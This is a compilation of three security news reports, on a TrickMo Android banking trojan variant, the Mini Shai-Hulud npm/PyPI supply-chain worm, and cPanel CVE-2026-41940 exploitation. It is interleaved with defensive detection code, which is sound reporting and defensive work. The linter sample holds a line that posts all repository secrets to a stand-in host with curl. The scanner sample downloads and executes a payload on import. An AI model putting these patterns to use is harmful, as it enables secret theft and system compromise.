Author: anonymousmedia_tal70o

  • New TrickMo Variant Uses TON C2 and SOCKS5 to Create Android Network Pivots

    Ravie Lakshmanan, May 12, 2026. Malware / Mobile Security

    Cybersecurity researchers have flagged a new version of the TrickMo Android banking trojan that uses The Open Network (TON) for command-and-control (C2).

    The new variant, observed by ThreatFabric between January and February 2026, was seen actively targeting banking and cryptocurrency wallet users in France, Italy, and Austria.

    “TrickMo relies on a runtime-loaded APK (dex.module), used also by the previous variant, but updated with new features adding new network-oriented functionality, including reconnaissance, SSH tunnelling, and SOCKS5 proxying capabilities that allow infected devices to function as programmable network pivots and traffic-exit nodes,” the Dutch mobile security company said in a report shared with The Hacker News.

    TrickMo is the name assigned to a device takeover (DTO) malware that has been active in the wild since late 2019. It was first flagged by CERT-Bund and IBM X-Force, which described its ability to abuse Android’s accessibility services to hijack one-time passwords (OTPs).


    It’s also equipped with a wide range of features to phish for credentials, log keystrokes, record the screen, facilitate live screen streaming, and intercept SMS messages, essentially granting the operator complete remote control of the device.

    The latest versions, labeled TrickMo C, are distributed via phishing websites and dropper apps, the latter of which serve as a conduit for a dynamically loaded APK (“dex.module”) that’s retrieved at runtime from attacker-controlled infrastructure. A notable shift in the architecture entails the use of the TON decentralized blockchain for stealthy C2 communications.

    “TrickMo carries an embedded native TON proxy that the host APK starts on a loopback port at process start,” ThreatFabric said. “The bot’s HTTP client is wired through that proxy, so every outbound command-and-control request is addressed to an .adnl hostname and resolved through the TON overlay.”

    Dropper apps containing the malware are promoted through Facebook as adult-themed versions of TikTok, whereas the actual malware impersonates Google Play Services. The observed package names are:

    • com.app16330.core20461 or com.app15318.core1173 (Dropper)
    • uncle.collop416.wifekin78 or nibong.lida531.butler836 (TrickMo)

    While previous iterations of “dex.module” implemented the accessibility-driven remote control functionality through a socket.io-based channel, the new version utilizes a network-operative subsystem that makes the malware more a tool for maintaining a managed foothold than a traditional banking trojan.

    The subsystem supports commands like curl, dnslookup, ping, telnet, and traceroute, giving the attacker a “remote shell-equivalent for network reconnaissance from the victim’s network position, including any internal corporate or home network the device is currently associated with,” per ThreatFabric.

    Another important feature is a SOCKS5 proxy that turns the compromised device into a network exit node that routes malicious traffic, while defeating IP-based fraud-detection signatures on banking, e-commerce and cryptocurrency exchange services.


    Furthermore, TrickMo includes two dormant features: it bundles the Pine hooking framework and declares extensive NFC-related permissions, but neither capability is actually implemented. This likely indicates the core developers are looking to expand the trojan’s capabilities in the future.

    “Instead of relying on conventional DNS and public internet infrastructure, the malware communicates through .adnl endpoints routed via an embedded local TON proxy, reducing the effectiveness of traditional takedown and network-blocking efforts while making the traffic blend with legitimate TON activity,” ThreatFabric said.

    “This latest variant also expands the operational role of infected devices through SSH tunnelling and authenticated SOCKS5 proxying, effectively turning compromised phones into programmable network pivots and traffic-exit nodes whose connections originate from the victim’s own network environment.”
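The authenticated SOCKS5 proxying described above can be recognised on the wire from the first few client bytes. The following is an added example, not code from the ThreatFabric report: a minimal parser for the RFC 1928 client greeting and the RFC 1929 username/password request, run over constructed captures, which a network sensor could use to flag a device that has started serving SOCKS5 with credentials.

```python
# Constructed captures, not from the ThreatFabric report: an RFC 1928 client greeting
# offering username/password auth, one offering no auth, an RFC 1929 credential
# request, and a non-SOCKS flow for contrast.
GREETING_AUTH = bytes([0x05, 0x02, 0x00, 0x02])   # VER=5, NMETHODS=2: no-auth, user/pass
GREETING_OPEN = bytes([0x05, 0x01, 0x00])         # VER=5, NMETHODS=1: no-auth only
USERPASS_REQ = bytes([0x01, 3]) + b"bot" + bytes([4]) + b"pass"   # VER=1, ULEN, UNAME, PLEN, PASSWD
NOT_SOCKS = b"GET / HTTP/1.1\r\n"

METHODS = {0x00: "no-auth", 0x01: "gssapi", 0x02: "username/password"}

def parse_greeting(data):
    """Return the auth methods offered in a SOCKS5 client greeting, or None if it is not one."""
    if len(data) < 2 or data[0] != 0x05:
        return None
    nmethods = data[1]
    if nmethods == 0 or len(data) < 2 + nmethods:
        return None
    return [METHODS.get(m, f"0x{m:02x}") for m in data[2:2 + nmethods]]

def parse_userpass(data):
    """Return (username, password) from an RFC 1929 subnegotiation request, or None."""
    if len(data) < 3 or data[0] != 0x01:
        return None
    ulen = data[1]
    if len(data) < 3 + ulen:
        return None
    plen = data[2 + ulen]
    if len(data) != 3 + ulen + plen:
        return None
    return (data[2:2 + ulen].decode("latin-1"), data[3 + ulen:].decode("latin-1"))

def classify_flow(first_msg, second_msg=b""):
    """Label client-to-proxy bytes: 'socks5-authenticated', 'socks5-open', 'socks5-other' or None."""
    methods = parse_greeting(first_msg)
    if methods is None:
        return None
    # Only treat the flow as authenticated when a real credential exchange follows the greeting.
    if "username/password" in methods and parse_userpass(second_msg):
        return "socks5-authenticated"
    return "socks5-open" if "no-auth" in methods else "socks5-other"
```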


  • Mini Shai-Hulud Worm Compromises TanStack, Mistral AI, Guardrails AI & More Packages

    TeamPCP, the threat actor behind the recent supply chain attack spree, has been linked to the compromise of the npm and PyPI packages from TanStack, UiPath, Mistral AI, OpenSearch, and Guardrails AI as part of a fresh Mini Shai-Hulud campaign.

    The affected npm packages have been modified to include an obfuscated JavaScript file (“router_init.js”) that’s designed to profile the execution environment and launch a comprehensive credential stealer capable of targeting cloud providers, cryptocurrency wallets, AI tools, messaging apps, and CI systems such as GitHub Actions, according to Aikido Security, Endor Labs, SafeDep, Socket, and StepSecurity. The data is exfiltrated to the “filev2.getsession[.]org” domain.

    Using Session Protocol infrastructure is a deliberate attempt on the part of the attackers to evade detection, as the domain is unlikely to be blocked within enterprise environments, given that it belongs to a decentralized, privacy-focused messaging service. As a fallback option, the encrypted data is committed to attacker-controlled repositories under the author name “claude@users.noreply.github.com” via the GitHub GraphQL API using the stolen GitHub tokens.


    The malware is also capable of establishing persistence hooks in Claude Code and Microsoft Visual Studio Code (VS Code) to survive reboots and re-execute the stealer on every launch of the IDEs.

    Furthermore, it installs a gh-token-monitor service to monitor and re-exfiltrate GitHub tokens, and injects two malicious GitHub Actions workflows to serialize repository secrets into a JSON object and upload the data to an external server (“api.masscan[.]cloud”).

    TanStack has since traced the compromise to a chained GitHub Actions attack involving the “pull_request_target” trigger, GitHub Actions cache poisoning, and runtime memory extraction of an OIDC token from the GitHub Actions runner process. “No npm tokens were stolen, and the npm publish workflow itself was not compromised,” TanStack said.

    Specifically, the attackers are assessed to have staged the malicious payload in a GitHub fork, injected it into published npm tarballs, then hijacked the project’s legitimate “TanStack/router” workflow to publish the compromised versions with valid SLSA provenance.
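Two of the workflow-level weaknesses named above, a “pull_request_target” job that runs fork-supplied code and an injected step that serializes repository secrets into JSON and uploads them, can both be caught by a simple repository audit. The following is an added example, not TanStack’s workflow or any vendor’s tool: a line-based linter run over a constructed risky workflow and its corrected counterpart (the trigger, checkout ref and step commands are illustrative assumptions).

```python
import re

# Constructed sample, not TanStack's actual workflow: the privileged pull_request_target
# trigger, a checkout of the PR head, a step that runs that untrusted code, and a step that
# serialises every repository secret into JSON and posts it to an external host.
RISKY_WORKFLOW = """\
on:
  pull_request_target:
    types: [opened, synchronize]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: npm ci && npm test
      - run: echo '${{ toJSON(secrets) }}' | curl -X POST --data-binary @- https://collector.example.invalid/
"""
# Constructed corrected shape: plain pull_request, where fork PRs get a read-only token
# and no repository secrets, so the same npm ci step cannot reach anything sensitive.
SAFE_WORKFLOW = """\
on:
  pull_request:
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm test
"""
PR_HEAD_REF = re.compile(r"github\.event\.pull_request\.head\.(sha|ref)")
INSTALLER = re.compile(r"\b(npm (ci|install)|yarn|pnpm install|pip install|make)\b")

def audit_workflow(text):
    """Return sorted finding codes for one workflow file (line-based heuristics, no YAML parser)."""
    findings = set()
    privileged = re.search(r"^\s*pull_request_target\s*:|^\s*on:.*pull_request_target", text, re.M)
    run_lines = [l for l in text.splitlines() if re.match(r"\s*-?\s*run:", l)]
    if privileged and PR_HEAD_REF.search(text) and any(INSTALLER.search(l) for l in run_lines):
        # Fork-supplied code executes with the base repository's secrets and write token.
        findings.add("PULL_REQUEST_TARGET_RUNS_PR_CODE")
    if "toJSON(secrets)" in text:
        # Every repository secret is serialised into one JSON object in a step.
        findings.add("SECRETS_SERIALIZED")
        if any(re.search(r"\b(curl|wget)\b.*https?://", l) for l in run_lines):
            findings.add("SECRETS_UPLOADED")
    return sorted(findings)
```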

    What makes the worm stand out is its ability to spread itself to other packages by locating a publishable npm token with bypass_2fa set to true, enumerating every package published by the same maintainer, and exchanging a GitHub OIDC token for a per-package publish token to sidestep traditional authentication entirely.

    The TanStack supply chain compromise has been assigned the CVE identifier CVE-2026-45321. It carries a CVSS score of 9.6 out of a maximum of 10.0, indicating critical severity. The incident has impacted 42 packages and 84 versions across the TanStack ecosystem.

    “The attack published malicious versions through the project’s own GitHub Actions release pipeline using hijacked OIDC tokens,” StepSecurity researcher Ashish Kurmi said.

    “In an extremely rare escalation, the compromised packages carry valid SLSA Build Level 3 provenance attestations, making this the first documented npm worm that produces validly attested malicious packages. The worm has since spread beyond TanStack to packages from UiPath, DraftLab, and other maintainers.”

    Besides TanStack, the Mini Shai-Hulud campaign has also spread to several other packages, including some in PyPI:

    • guardrails-ai@0.10.1 (PyPI)
    • mistralai@2.4.6 (PyPI)
    • @opensearch-project/opensearch@3.5.3, 3.6.2, 3.7.0, and 3.8.0
    • @squawk/mcp@0.9.5
    • @squawk/weather@0.5.10
    • @squawk/flightplan@0.5.6
    • @tallyui/connector-medusa@1.0.1, 1.0.2, and 1.0.3
    • @tallyui/connector-vendure@1.0.1, 1.0.2, and 1.0.3

    Microsoft, in its analysis of the malicious mistralai PyPI package, said it’s designed to download a credential stealer from a remote server (“83.142.209[.]194”) that includes country-aware logic to avoid Russian-language environments and a “geofenced destructive branch that has a 1-in-6 chance of executing rm -rf / when the system appears to be in Israel or Iran.”

    “The guardrails-ai@0.10.1 compromise is especially notable because the malicious code executes on import,” Socket said. “The package checks for Linux systems, downloads a remote Python artifact from https://git-tanstack.com/transformers.pyz, writes it to /tmp/transformers.pyz, and executes it with python3 without integrity verification.”
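The point Socket makes about guardrails-ai@0.10.1 is that the download-and-run logic sits at module level, so it fires on import rather than when some function is called. The following is an added example, not Socket’s tooling or the package’s code: an `ast`-based scan that distinguishes calls reached at import time from calls inside function bodies, run over a constructed sample with a placeholder URL (the call names it recognises are a heuristic list, not the full set).

```python
import ast

# Constructed sample (placeholder URL, not the real one) of the on-import shape Socket
# describes: platform check, download, write to /tmp, execute with python3, all at module level.
IMPORT_TIME_SAMPLE = '''
import platform, subprocess, urllib.request
if platform.system() == "Linux":
    data = urllib.request.urlopen("https://payload.example.invalid/t.pyz").read()
    with open("/tmp/t.pyz", "wb") as f:
        f.write(data)
    subprocess.run(["python3", "/tmp/t.pyz"])
'''
# Constructed benign sample: the same calls, but inside a function that import does not run.
DEFERRED_SAMPLE = '''
import subprocess, urllib.request
def update():
    data = urllib.request.urlopen("https://example.invalid/x").read()
    subprocess.run(["python3", "-c", "pass"])
'''
DOWNLOAD_CALLS = {"urllib.request.urlopen", "urlopen", "urllib.request.urlretrieve", "requests.get"}
EXEC_CALLS = {"subprocess.run", "subprocess.Popen", "subprocess.call", "os.system", "os.execv"}

def _dotted(node):
    """Render a callee such as subprocess.run as a dotted string ('' for anything else)."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted(node.value)
        return f"{base}.{node.attr}" if base else node.attr
    return ""

def import_time_behaviours(source):
    """Return the set of behaviours reached at import time (function/lambda bodies excluded).
    {'download', 'exec'} together is the download-and-run-on-import pattern."""
    found = set()
    def walk(node):
        for child in ast.iter_child_nodes(node):
            if isinstance(child, (ast.FunctionDef, ast.AsyncFunctionDef, ast.Lambda)):
                continue  # runs only when called, so not on import
            if isinstance(child, ast.Call):
                name = _dotted(child.func)
                if name in DOWNLOAD_CALLS:
                    found.add("download")
                elif name in EXEC_CALLS:
                    found.add("exec")
                elif name == "open" and any(isinstance(a, ast.Constant) and
                                            str(a.value).startswith("/tmp/") for a in child.args):
                    found.add("writes_tmp")
            walk(child)
    walk(ast.parse(source))
    return found
```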

    “This latest activity shows the campaign continuing to propagate across both npm and PyPI, with affected packages spanning search infrastructure, AI tooling, aviation-related developer packages, enterprise automation, frontend tooling, and CI/CD-adjacent ecosystems.”


  • cPanel CVE-2026-41940 Under Active Exploitation to Deploy Filemanager Backdoor

    Ravie Lakshmanan, May 11, 2026. Vulnerability / Ransomware

    A threat actor named Mr_Rot13 has been attributed to the exploitation of a recently disclosed critical cPanel flaw to deploy a backdoor codenamed Filemanager on compromised environments.

    The attack exploits CVE-2026-41940, a vulnerability impacting cPanel and WebHost Manager (WHM) that could result in an authentication bypass and allow remote attackers to gain elevated control of the control panel.

    According to a new report from QiAnXin XLab, the security defect was exploited by a number of threat actors shortly after its public disclosure late last month, resulting in malicious behaviors like cryptocurrency mining, ransomware, botnet propagation, and backdoor implantation.

    “Monitoring data shows that more than 2,000 attacker source IPs worldwide are currently involved in automated attacks and cybercrime activities targeting this vulnerability,” XLab researchers said. “These IPs are distributed across multiple regions globally, primarily originating from Germany, the United States, Brazil, the Netherlands, and other regions.”


    Further analysis of the ongoing exploitation activity has uncovered a shell script that uses wget or curl to download a Go-based infector from a remote server (“cp.dene.[de[.]com”) that’s designed to implant a compromised cPanel system with an SSH public key for persistent access, along with dropping a PHP web shell that facilitates file upload/download and remote command execution.

    The web shell is then used to inject JavaScript code that serves a customized login page to steal login credentials and siphon them to an attacker-controlled system whose domain is encoded using the ROT13 cipher (“wrned[.]com”). Once the details are transmitted, the attack chain culminates with the deployment of a cross-platform backdoor that’s capable of infecting Windows, macOS, and Linux systems.

    The infector is also equipped to collect sensitive information from the compromised host, including bash history, SSH data, device information, database passwords, and cPanel virtual aliases (aka valiases), and send it to a three-member Telegram group created by a user named “0xWR.”

    In the infection sequence analyzed by XLab, Filemanager is delivered via a shell script downloaded from the “wpsock[.]com” domain. The backdoor supports file management, remote command execution, and shell functionality.


    There are signs that the threat actor behind the operation has been operating silently in the shadows for years. This assessment is based on the fact that the command-and-control (C2) domain embedded in the JavaScript code has been put to use in a PHP-based backdoor (“helper.php”) that was uploaded to the VirusTotal platform in April 2022. The domain was first registered in October 2020.

    “Over the six years from 2020 to the present, the detection rate of Mr_Rot13’s related samples and infrastructure across security products has remained extremely low,” XLab said.
